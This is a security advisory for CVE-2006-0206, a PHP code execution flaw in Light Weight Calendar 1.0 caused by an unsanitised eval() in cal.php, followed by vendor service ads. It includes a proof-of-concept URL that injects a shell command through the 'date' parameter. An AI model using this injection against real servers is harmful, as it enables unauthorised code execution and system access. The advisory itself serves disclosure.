PHP Code Execution in Light Weight Calendar

Summary

Vulnerability
PHP Code Execution in Light Weight Calendar
Discovered
2006.01.12
Last Update
0 n/a
ID
EV0029
CVE
CVE-2006-0206
Risk Level
high
Type
PHP Code Execution
Status
Unpatched
Vendor
n/a
Vulnerable Software
Light Weight Calendar (http://sourceforge.net/projects/lwcal/)
Version
1.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

PHP Code Execution found in Light Weight Calendar (http://sourceforge.net/projects/lwcal/) script.

Vulnerable script: cal.php

Function eval() is called with user-defined parameter which is not properly sanitized. This can be used to execute arbitrary PHP code.

System access is possible.

PoC/Exploit

PHP Code Execution example.
http://host/lwc/index.php? stam=1928504&date=20050901);%20echo%20(%60ls%20-la%60 &View=month

Solution.

Solution for "PHP Code Execution in Light Weight Calendar" is not available. Check vendor's website for updates.

Order PHP Code Audit made by eVuln

Check your site by source code analysis of your website made by Aliaksandr Hartsuyeu.The work will be done by experts in web application security.

Advisories by vuln type

Website Monitoring

Daily malware scanning. Allows to receive alerts about security problems in your website.
Details >>

Malicious redirects detected?

eVuln team will eliminate the reason, clean your website and monitor it.
Details >>

Website blacklisted?

eVuln team will clean your website, discover and fix security holes, remove from blacklists.
Details >>